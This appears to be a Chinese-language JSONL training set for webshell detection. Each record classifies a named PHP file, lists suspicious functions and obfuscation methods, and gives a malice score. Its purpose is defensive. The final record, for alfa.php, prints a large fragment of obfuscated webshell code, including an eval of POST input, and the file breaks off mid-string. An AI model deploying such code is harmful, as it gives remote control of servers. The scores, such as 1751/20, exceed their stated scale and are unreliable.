{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"脱库工具.php\", \"文件类型\": \"php\", \"文件大小\": \"205982 bytes\", \"行数\": 1434}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, exec( 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1751/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/脱库工具.php", "malicious_score": 1751, "md5_hash": "cca26e293416cc8bd0602206008ae6b7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql脱库.php\", \"文件类型\": \"php\", \"文件大小\": \"3266 bytes\", \"行数\": 73}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fputs(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/mysql脱库.php", "malicious_score": 27, "md5_hash": "49fc50f2d7258d0e901495b62bf994c6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zip.func.php\", \"文件类型\": \"php\", \"文件大小\": \"13419 bytes\", \"行数\": 352}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval( 发现混淆技术: unpack\\s*\\(, gzinflate, pack\\s*\\( 具备文件操作能力: fopen\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/mysql/zip.func.php", "malicious_score": 13, "md5_hash": "a25f35659514887dcc6416623e7e9816"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"index.php\", \"文件类型\": \"php\", \"文件大小\": \"42444 bytes\", \"行数\": 1125}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(array('/character set \\w+/i', '/collate \\w+/i', '/ENGINE=MEMORY/i', '/\\s*DEFAULT CHARSET=\\w+/is', '/\\s*COLLATE=\\w+/is', '/E, $_GET[, fwrite(, exec(, eval( 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 169/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/mysql/index.php", "malicious_score": 169, "md5_hash": "30f5235496060bb4941a485c4b2ceeed"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"33190 bytes\", \"行数\": 1204}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_GET[, $_POST[, exec( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 157/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/webshell.php", "malicious_score": 157, "md5_hash": "9b795afa8397ac0281c31398273e28b6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gfs_sh.php\", \"文件类型\": \"php\", \"文件大小\": \"64097 bytes\", \"行数\": 1575}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 510/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/gfs_sh.php", "malicious_score": 510, "md5_hash": "b307609886afff38d1864d90ff97db57"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"01ea9fce1cc4e85df1d0332551e504db.php\", \"文件类型\": \"php\", \"文件大小\": \"1405 bytes\", \"行数\": 56}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, $_POST[, system(, fputs ( 包含网络功能: fsockopen 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/01ea9fce1cc4e85df1d0332551e504db.php", "malicious_score": 37, "md5_hash": "6cb98560df19790d6bfd2d29a3a7fec5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"26aff140c2f73f11d0c78b8823ade092.php\", \"文件类型\": \"php\", \"文件大小\": \"44116 bytes\", \"行数\": 1264}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 407/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/26aff140c2f73f11d0c78b8823ade092.php", "malicious_score": 407, "md5_hash": "dc4228c87d09316f9eb7b183e93f0e05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"e3c027bb98c5d0aed8e5b3dcd8d3c7f4.php\", \"文件类型\": \"php\", \"文件大小\": \"98732 bytes\", \"行数\": 2115}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1228/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/e3c027bb98c5d0aed8e5b3dcd8d3c7f4.php", "malicious_score": 1228, "md5_hash": "41af6fd253648885c7ad2ed524e0692d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zip.php\", \"文件类型\": \"php\", \"文件大小\": \"9929 bytes\", \"行数\": 342}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, eval( 发现混淆技术: pack\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, mkdir\\s*\\(, fwrite\\s*\\( 恶意度评分: 103/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/zip.php", "malicious_score": 103, "md5_hash": "53446381f7ea718ac13be71018668e3a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9684eadee77b7b7531e9afea678886b5.php\", \"文件类型\": \"php\", \"文件大小\": \"107177 bytes\", \"行数\": 2019}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 906/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/9684eadee77b7b7531e9afea678886b5.php", "malicious_score": 906, "md5_hash": "fa0a05b09cd538c7a81232a7334f5891"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"45a89cfad9b08c57e9193059bab00f23.php\", \"文件类型\": \"php\", \"文件大小\": \"439 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/45a89cfad9b08c57e9193059bab00f23.php", "malicious_score": 11, "md5_hash": "a524e7ae8d71e37d2fd3e5fbdab405ea"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c5c9de651fc8fea0fb017bc3ba19bb1c.php\", \"文件类型\": \"php\", \"文件大小\": \"9622 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/c5c9de651fc8fea0fb017bc3ba19bb1c.php", "malicious_score": 55, "md5_hash": "45b9f42b3fa2c7c41b0add04c6d99d97"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"small.php\", \"文件类型\": \"php\", \"文件大小\": \"53588 bytes\", \"行数\": 23}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/small.php", "malicious_score": 13, "md5_hash": "fcee6226d09d150bfa5f103bee61fbde"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5e74b8d3ac3844c24f0642b80a3c8696.php\", \"文件类型\": \"php\", \"文件大小\": \"46553 bytes\", \"行数\": 565}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, $_POST[, exec(, system( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 492/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/5e74b8d3ac3844c24f0642b80a3c8696.php", "malicious_score": 492, "md5_hash": "3823ac218032549b86ee7c26f10c4cb5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fcb28fa88652ac3a7b94bfd36d1cb8c8.php\", \"文件类型\": \"php\", \"文件大小\": \"137851 bytes\", \"行数\": 2884}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 763/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/fcb28fa88652ac3a7b94bfd36d1cb8c8.php", "malicious_score": 763, "md5_hash": "c8b244a825e1d049b07a661536558e47"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a_gedit.php\", \"文件类型\": \"php\", \"文件大小\": \"30853 bytes\", \"行数\": 693}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 307/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/a_gedit.php", "malicious_score": 307, "md5_hash": "49aacf279c6c4d2156e752121efa7a02"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6c52d3770801569a93c553039d8894c9.php\", \"文件类型\": \"php\", \"文件大小\": \"111841 bytes\", \"行数\": 2029}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 1542/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/6c52d3770801569a93c553039d8894c9.php", "malicious_score": 1542, "md5_hash": "e22d8cae4a4eb06d8edcb4c1bc3fef5e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"alfa.php\", \"文件类型\": \"php\", \"文件大小\": \"524071 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"[^A-\\x5a\\x61-\\x7a\\x30-\\x39\\x5c+\\\\/\\x5c=]\",\"\",${${\"\\x47\\x4cOBA\\x4cS\"}[\"\\x6a\\x71e\\x64\\x6b\\x78\\x6c\\x6atlwl\"]});${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x68xwt\\x6e\\x6b\"]=\"ou\\x74\\x70u\\x74\";do{${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x77\\x73m\\x65\\x6df\\x79\\x68y\\x65\"]=\"i\\x6e\\x70\\x75t\";$lmbcdbfbweg=\"\\x69n\\x70\\x75\\x74\";${\"\\x47L\\x4f\\x42\\x41LS\"}[\"dv\\x68\\x6b\\x66\\x77\\x73nt\\x68\"]=\"\\x6be\\x79S\\x74\\x72\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x69\\x6b\\x66sl\\x63\\x6f\"]=\"\\x65n\\x63\\x32\";$yogxsxqpl=\"e\\x6e\\x63\\x33\";$bdgblgrrl=\"c\\x68\\x72\\x31\";$wmumelmp=\"i\";${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"yd\\x6e\\x75\\x77\\x68\\x6a\"]}=strpos(${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"n\\x77\\x6cg\\x66\\x68w\\x63\"]},substr(${$lmbcdbfbweg},${$wmumelmp}++,1));${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6e\\x62u\\x77\\x65\\x69ih\\x78\\x66\\x68\"]=\"\\x6be\\x79St\\x72\";${\"G\\x4c\\x4f\\x42AL\\x53\"}[\"\\x69t\\x67\\x63\\x63n\\x67c\\x65\\x7a\\x77o\"]=\"\\x65n\\x633\";${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x77\\x6c\\x7a\\x61ah\\x64\\x67\\x6a\\x78\"]}=strpos(${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"dv\\x68k\\x66\\x77\\x73n\\x74h\"]},substr(${${\"G\\x4c\\x4f\\x42AL\\x53\"}[\"\\x66r\\x7am\\x68\\x68\\x64\"]},${${\"\\x47LOB\\x41\\x4cS\"}[\"\\x75\\x67\\x72\\x61\\x75\\x63\\x61\\x6bb\\x6c\"]}++,1));$ixtudtdjed=\"en\\x63\\x34\";$eeigua=\"\\x6b\\x65\\x79\\x53\\x74\\x72\";$swinolm=\"\\x69\";$pcmjurbt=\"\\x63hr3\";${${\"G\\x4cO\\x42ALS\"}[\"\\x6dgy\\x65\\x6f\\x65rz\\x6e\\x74g\"]}=strpos(${$eeigua},substr(${${\"\\x47LOB\\x41L\\x53\"}[\"\\x66\\x72\\x7a\\x6d\\x68\\x68\\x64\"]},${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x67\\x72a\\x75\\x63\\x61k\\x62\\x6c\"]}++,1));${${\"\\x47L\\x4fB\\x41\\x4cS\"}[\"\\x7at\\x72\\x71\\x6ed\\x74\\x74\\x74ua\\x71\"]}=strpos(${${\"G\\x4cO\\x42A\\x4c\\x53\"}[\"n\\x62\\x75wei\\x69\\x68\\x78f\\x68\"]},substr(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x77\\x73\\x6d\\x65mfy\\x68\\x79\\x65\"]},${$swinolm}++,1));${${\"GLOB\\x41\\x4c\\x53\"}[\"\\x77y\\x64d\\x6b\\x73\\x64\\x70u\"]}=(${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"y\\x64\\x6e\\x75\\x77\\x68\\x6a\"]}<<2)|(${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"ik\\x66s\\x6c\\x63o\"]}>>4);${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x73\\x72u\\x63\\x77\\x69\\x74\\x68\"]}=((${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x77l\\x7aa\\x61\\x68d\\x67jx\"]}&15)<<4)|(${${\"\\x47\\x4c\\x4fBA\\x4cS\"}[\"m\\x67y\\x65\\x6f\\x65\\x72\\x7a\\x6e\\x74g\"]}>>2);${$pcmjurbt}=((${${\"\\x47LO\\x42\\x41L\\x53\"}[\"\\x6d\\x67\\x79\\x65o\\x65\\x72\\x7a\\x6e\\x74\\x67\"]}&3)<<6)|${$ixtudtdjed};${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x68\\x70e\\x65c\\x77\\x6b\"]}=${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x68p\\x65\\x65\\x63\\x77k\"]}.chr((int)${${\"\\x47L\\x4fB\\x41\\x4cS\"}[\"\\x77y\\x64\\x64\\x6bsdp\\x75\"]});if(${$yogxsxqpl}!=64){${\"\\x47L\\x4fBA\\x4cS\"}[\"\\x75\\x6aw\\x64\\x73\\x6d\\x68g\\x73\\x6er\"]=\"ch\\x72\\x32\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x6ae\\x69\\x68\\x6f\\x74\"]=\"\\x6f\\x75\\x74p\\x75t\";${${\"G\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"hp\\x65\\x65c\\x77\\x6b\"]}=${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6a\\x65\\x69\\x68\\x6ft\"]}.chr((int)${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75j\\x77\\x64\\x73m\\x68gs\\x6er\"]});}if(${${\"G\\x4c\\x4fB\\x41L\\x53\"}[\"\\x7a\\x74\\x72\\x71nd\\x74\\x74t\\x75\\x61\\x71\"]}!=64){${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"\\x68p\\x65\\x65\\x63\\x77\\x6b\"]}=${${\"GLOBAL\\x53\"}[\"h\\x70\\x65\\x65\\x63w\\x6b\"]}.chr((int)${${\"\\x47\\x4cOBALS\"}[\"\\x73g\\x68j\\x73dr\\x67\\x71\\x6e\"]});}${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x6aq\\x6aw\\x75\"]=\"\\x63\\x68r3\";${$bdgblgrrl}=${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x73\\x72\\x75\\x63w\\x69\\x74h\"]}=${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"nj\\x71j\\x77\\x75\"]}=\"\";${${\"\\x47L\\x4f\\x42AL\\x53\"}[\"\\x79d\\x6e\\x75\\x77\\x68\\x6a\"]}=${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x77l\\x7aa\\x61\\x68d\\x67\\x6a\\x78\"]}=${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x69\\x74\\x67\\x63\\x63\\x6eg\\x63e\\x7a\\x77\\x6f\"]}=${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"ztrq\\x6e\\x64\\x74\\x74t\\x75a\\x71\"]}=\"\";}while(${${\"\\x47LO\\x42\\x41L\\x53\"}[\"e\\x63\\x67gi\\x6dn\\x7a\\x75\"]}<\\x62r\\x3e\";}if(empty($_POST[\"a\\x6a\\x61\\x78\"])&&!empty($_POST[\"\\x701\"]))$_SESSION[md5($_SERVER[\"H\\x54\\x54P_HOS\\x54\"]).\"\\x61j\\x61\\x78\"]=false;echo\"\\x3c\\x68\\x31>\\x45\\x78\\x65\\x63\\x75\\x74\\x69on\\x20P\\x48\\x50-cod\\x65\\x3cdi\\x76\\x20\\x63\\x6c\\x61ss=content>\\x3c\\x74e\\x78ta\\x72e\\x61\\x20\\x6e\\x61m\\x65=\\x63\\x6f\\x64e\\x20clas\\x73=\\x62\\x69ga\\x72ea\\x20i\\x64=\\x50hp\\x43o\\x64\\x65\\x3e\".(!empty($_POST[\"\\x701\"])?htmlspecialchars($_POST[\"\\x701\"]):\"\").\"\\x3c/\\x74\\x65xt\\x61rea>\\x3c\\x69\\x6ep\\x75\\x74\\x20\\x74\\x79\\x70e\\x3d\\x73\\x75bmit \\x76\\x61\\x6cu\\x65\\x3dE\\x76\\x61\\x6c st\\x79l\\x65=\\\"\\x6da\\x72gi\\x6e-\\x74\\x6f\\x70:\\x35\\x70\\x78\\\">\";echo\" <\\x70r\\x65\\x20\\x69d=Php\\x4futp\\x75t\\x20st\\x79le=\\x22\".(empty($_POST[\"p1\"])?\"\\x64\\x69\\x73pla\\x79:none\\x3b\\n\":\"\").\"mar\\x67i\\x6e-t\\x6f\\x70:\\x35p\\x78\\x3b\\n\\x22 \\x63\\x6cas\\x73=ml1\\x3e\";if(!empty($_POST[\"\\x701\"])){ob_start();eval($_POST[\"p1\"]);echo htmlspecialchars(ob_get_clean());}echo\"${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"sl\\x70\\x65\\x6cc\"]})$_SESSION[\"\\x66\"][${${\"\\x47L\\x4fBALS\"}[\"\\x6bs\\x76e\\x76j\\x6b\\x67t\\x76j\"]}]=urldecode(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"s\\x6c\\x70\\x65\\x6c\\x63\"]});$_SESSION[\"\\x63w\\x64\"]=@$_POST[\"c\"];}break;}echo\"\\x3csc\\x72i\\x70\\x74\\x3edoc\\x75ment\\x2e\\x6df\\x2e\\x70\\x31\\x2ev\\x61l\\x75\\x65=\\x22\\x22;\\n\\x64o\\x63um\\x65nt\\x2em\\x66.p2\\x2ev\\x61l\\x75\\x65\\x3d\\\"\\x22;\\n\\n\\tfu\\x6e\\x63ti\\x6fn\\x20sa()\\x20{\\n\\t\\tfo\\x72(i\\x3d\\x30;\\n\\x69<\\x64\\x6fc\\x75m\\x65\\x6e\\x74\\x2ef\\x69\\x6ces\\x2e\\x65l\\x65men\\x74\\x73.len\\x67t\\x68;\\n\\x69++)\\n\\t\\t\\t\\x69f(\\x64o\\x63um\\x65n\\x74\\x2ef\\x69\\x6ces\\x2e\\x65\\x6c\\x65me\\x6ets[i].\\x74\\x79\\x70e\\x20\\x3d\\x3d 'ch\\x65c\\x6bbo\\x78\\x27)\\n\\t\\t\\t\\tdo\\x63\\x75\\x6d\\x65n\\x74\\x2efi\\x6c\\x65\\x73.\\x65\\x6cem\\x65\\x6et\\x73[\\x69]\\x2ech\\x65\\x63k\\x65d\\x20= docume\\x6et\\x2efi\\x6ce\\x73\\x2ee\\x6c\\x65\\x6den\\x74s[\\x30].\\x63\\x68e\\x63\\x6be\\x64;\\n\\t}\\n\\n\\x3c\\x66o\\x72m nam\\x65\\x3d\\x66i\\x6ces \\x6de\\x74\\x68\\x6f\\x64\\x3d\\x70\\x6fs\\x74>\\n\\n\";${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x61\\x6dg\\x6el\\x73r\\x62\\x63\\x64\"]=\"\\x6c\\x69\\x6e\\x6bs\";$htjtdlybuf=\"n\";echo\"\\x3c\\x74h wi\\x64t\\x68\\x3d\\x27\\x31\\x33\\x70x'\\x3e\\x3c/\\x74\\x68>\\x3ct\\x68>\\x3c\\x61 hr\\x65f=\\x27\\x23\\x27\\x20\\x6fn\\x63\\x6cic\\x6b\\x3d'g(\\\"\\x46\\x69l\\x65\\x73\\x4d\\x61\\x6e\\\",\\x6e\\x75\\x6c\\x6c,\\x22\\x73\\x5f\\x6e\\x61me\\x5f\".(${${\"\\x47\\x4cOB\\x41LS\"}[\"c\\x6f\\x71onu\"]}[1]?0:1).\"\\x22)'\\x3eNa\\x6de\\x3c/a>\\x3c/\\x74\\x68>\\x3c\\x74h>\\x3ca\\x20\\x68\\x72\\x65\\x66='#'\\x20o\\x6e\\x63li\\x63k='g(\\x22F\\x69l\\x65s\\x4d\\x61\\x6e\\x22,\\x6eu\\x6cl,\\x22\\x73_s\\x69\\x7a\\x65_\".(${$jiychdnx}[1]?0:1).\"\\x22)'\\x3eS\\x69\\x7a\\x65\\x3c/a\\x3e\\x3c/\\x74\\x68>\\x3cth\\x3e\\x3c\\x61 \\x68\\x72e\\x66\\x3d\\x27#\\x27 \\x6fn\\x63l\\x69c\\x6b\\x3d'g(\\x22F\\x69\\x6ce\\x73\\x4d\\x61\\x6e\\\",n\\x75l\\x6c,\\\"s_\\x6d\\x6f\\x64\\x69fy_\".(${$cxlakobzy}[1]?0:1).\"\\\")'>M\\x6fd\\x69fy\\x3c/\\x61>\\x4f\\x77n\\x65\\x72/\\x47\\x72\\x6fup\\x3c/\\x74\\x68\\x3e\\x3cth\\x3e\\x3c\\x61\\x20hr\\x65f\\x3d'\\x23\\x27\\x20o\\x6e\\x63l\\x69c\\x6b\\x3d'g(\\x22\\x46ile\\x73M\\x61n\\\",n\\x75\\x6c\\x6c,\\\"s_perm\\x73_\".(${${\"\\x47LOBA\\x4cS\"}[\"\\x63kco\\x75\\x69\\x7a\\x78\"]}[1]?0:1).\"\\\")'\\x3e\\x50e\\x72\\x6d\\x69\\x73s\\x69ons<\\x74\\x68\\x3eAc\\x74ions\\x3c/t\\x72\\x3e\";${$quowyumn}=${$fifmgtmy}=${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"u\\x6c\\x75\\x6b\\x75\\x75\\x74\\x6a\\x65\\x6by\"]}=array();${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"j\\x65\\x79\\x65\\x6a\\x65jv\\x65\\x73\"]}=count(${$dkgdoor});for(${${\"GL\\x4fB\\x41L\\x53\"}[\"\\x70y\\x6e\\x6d\\x69\\x6f\\x72\\x69s\"]}=0;${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x6c\\x77\\x6c\\x68tf\\x6b\\x65\\x6a\"]}<${$htjtdlybuf};${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67\\x6diyvs\\x63\\x62\"]}++){${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"y\\x67\\x6a\\x78\\x73\\x6c\\x71\"]=\"i\";$nhkfjokyipxw=\"t\\x6d\\x70\";${\"G\\x4c\\x4fBA\\x4cS\"}[\"x\\x6d\\x7a\\x71\\x66o\"]=\"t\\x6dp\";$hxhtkxcopfku=\"i\";${\"G\\x4cOB\\x41\\x4c\\x53\"}[\"\\x62\\x6eh\\x69\\x72\\x6f\\x6a\\x68\\x67\\x78g\\x77\"]=\"\\x67\\x72\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x77\\x69\\x65\\x74\\x63\\x72\\x6f\"]=\"\\x64i\\x72\\x43\\x6f\\x6eten\\x74\";$gkiykg=\"d\\x69\\x72\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\";$oolvws=\"\\x69\";${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x6c\\x65\\x66\\x66q\\x7a\\x78\\x76\\x76\"]=\"\\x64\\x69rC\\x6fn\\x74\\x65n\\x74\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66\\x6b\\x76q\\x6bb\\x6d\"]=\"\\x64\\x69\\x72\\x43\\x6f\\x6e\\x74\\x65n\\x74\";$oqwfempygnqr=\"\\x64\\x69\\x72\\x43\\x6fn\\x74\\x65\\x6et\";$iesoyaib=\"\\x69\";${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"k\\x68\\x63zds\\x78\\x66j\\